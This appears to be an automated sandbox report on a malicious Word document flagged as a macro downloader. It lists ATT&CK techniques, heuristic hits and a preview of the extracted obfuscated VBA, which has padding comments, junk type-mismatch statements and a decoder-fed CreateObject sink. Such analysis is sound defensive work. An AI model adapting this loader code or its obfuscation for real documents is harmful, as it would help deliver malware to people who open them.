Verdict: MALICIOUS (Risk Score 282)
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document carrying obfuscated VBA macros. The recovered source shows the loader shape behind the critical and high heuristic firings: an AutoOpen entry point, `On Error Resume Next` at the top of each routine, many dead statements that apply numeric functions to string literals (for example `Atn("Pizza")` and `Tan("214.221.129.97")`) so that the resulting type-mismatch errors are silently swallowed, comment lines of generated postal addresses used as padding, and a single real sink, `CreateObject(Mebdmefj(Mebdmefj(qiwhdjkasdA)))`, whose ProgID is produced by two passes of a custom decoder and therefore never appears in the source. The behaviour is consistent with a downloader that fetches and runs a second-stage payload, as the ClamAV signature name also indicates, but the decoder body, the decoded ProgID and any download URL are not in the evidence shown here. The browser User-Agent strings and IPv4 addresses present as literals are assigned to variables that are never referenced in the visible portion of the code, so they cannot be confirmed as network indicators, and the only extracted URL is the OOXML DrawingML schema namespace, a normal artifact of the file format rather than a destination. The legacy WordBasic marker finding states that no modern VBA project was recovered, which the extracted macros.bas contradicts; treat that finding as redundant rather than as separate evidence.
Heuristics (8)
- ClamAV: Doc.Downloader.Generic-7355718-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7355718-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39744 bytes | 9f46c933089512226b2b7ed2f649446d654c8ef684ca164be73815121fa6550a |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Ofklqscrz"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Plkcvxytn, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Sbbyxphpqfqlx, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Bgqsexptojse, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Dafffhul, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Pilpfzpxc, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Lbaeiuqjeug, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Brmwbwaaooau, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Gaaptlhziydlh, 7, 7, MSForms, CommandButton"
Attribute VB_Name = "Sjbpdcda"
Function qiwhdjkasd(qiwhdjkasdA)
On Error Resume Next
''''''Lewandowski - Soltys Apt. 342 Northwest Szulc LLC Apt. 950 North
''''''Kowalewski Group Suite 438 Northeast Bielawski - Graczyk Apt. 902 West
Ufrgqxfiopze = Atn("Pizza")
Sojfpsjrblenw = Atn(Amrpziyiasj)
Iujnfuohgyt = "Bike"
''''''Urbanowicz - Rudzki Apt. 473 North Jezierski - Golebiowski Suite 710 Northwest
Degbcbmuo = CStr(661)
''''''Pietrzyk, Gutowski and Pietrzak Suite 792 Northwest Lesniak and Sons Apt. 071 Northeast
Ovqtginge = Int(Gbribeftoy)
Eubzpibvtrc = CStr(779)
''''''Niewiadomski Inc Suite 552 North Kot, Filipowicz and Czajka Apt. 940 Northeast
''''''Glab - Stanek Suite 479 West Jarzabek, Jarosz and Brzezinski Suite 350 Southwest
Evbxkmapuy = Int(Uzipvojedl)
Jxydwpoy = Oct(752)
''''''Maslanka - Wilczynski Suite 109 Northeast Kaluza LLC Apt. 320 East
Xjevdlkbkwwpv = "Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/531.0.1 (KHTML, like Gecko) Chrome/18.0.812.0 Safari/531.0.1"
Gydstgswxomo = Fjgqwbzkakyu
''''''Przybylski, Klos and Kowalik Apt. 681 South Jagiello, Zurek and Lukasiewicz Suite 060 West
Chtcpkqr = Tan("214.221.129.97")
Zrfmggrwn = Fix(Mpzzhtvxs)
Equpukzlcnyaq = "210.232.217.237"
''''''Wojtas Inc Suite 218 Southwest Kolodziej Inc Apt. 502 Southeast
Mettbgtwpsudi = Log(731)
Set qiwhdjkasd = CreateObject(Mebdmefj(Mebdmefj(qiwhdjkasdA)))
''''''Poplawski Inc Suite 807 Northwest Kucharczyk - Szczygiel Suite 623 North
''''''Wierzbicki Group Apt. 004 South Bukowski - Jurek Apt. 901 East
Exmqoypfun = Atn("210.0.101.86")
Kffkxjnmiuvl = CSng(Nhqetdsyyrhbt)
Hzydmwtsz = "Chips"
''''''Ciszewski, Serafin and Kawa Suite 452 East Bednarek - Stepniak Apt. 830 North
Rrdkcatqkh = CLng(455)
''''''Jankowski LLC Apt. 171 East Buczkowski, Smolinski and Rybarczyk Apt. 852 Northeast
Ttbmgndwqih = CDate(Wijbuprckmbu)
Ghcuysjejlk = CSng(82)
''''''Majka and Sons Suite 653 Northwest Pilch, Bartosik and Olejnik Suite 672 South
''''''Rózanski, Mierzejewski and Drozdowski Suite 360 Northwest Szczepaniak - Marciniak Suite 545 Northwest
Vesjjcpfs = Int(Prxnjhassxw)
Ojilszyrikv = Tan(894)
''''''Szczepaniak, Mróz and Chojnacki Suite 633 East Budzinski LLC Suite 404 Southwest
Crrzkoxneguw = "Hagenes LLCSuite 957West"
Ksuhzpfv = Dmslyggcpqei
''''''Szatkowski LLC Apt. 618 Southwest Galazka, Lipinski and Gawronski Suite 050 East
Nhrzjcopxxny = CBool("Future40445 Tierra Fall, Annamariemouth, Gabon")
Wimhqxvx = Oct(Pxargewcrb)
Xflyfopvxzsc = "Ferry GroupApt. 240Southwest"
''''''Wasik, Pawelec and Glowacki Apt. 028 South Marzec and Sons Suite 980 North
Exrdxqmfk = Oct(325)
End Function
Function Ojwcmtqhk()
On Error Resume Next
''''''Podgórski - Urbanowicz Apt. 067 East Lesniewski - Szulc Apt. 205 Northeast
''''''Krukowski - Bogucki Suite 687 West Jackowski - Sliwa Apt. 492 Northwest
Ykcnutbb = CLng("Tillman - DickiSuite 759Northeast")
Vydsjxvlcbkd = Hex(Pxfmufzc)
Cqswmgrkdeo = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; .NET CLR 3.3.90691.4)"
''''''Wronski LLC Suite 199 South Bartnik, Nowakowski and Mackowiak Apt. 601 Southwest
Oubftgfsv = Hex(64)
''''''Kaczmarek, Malecki and Skiba Apt. 368 West Sowinski - Pietrzak Apt. 862 East
```
... (truncated)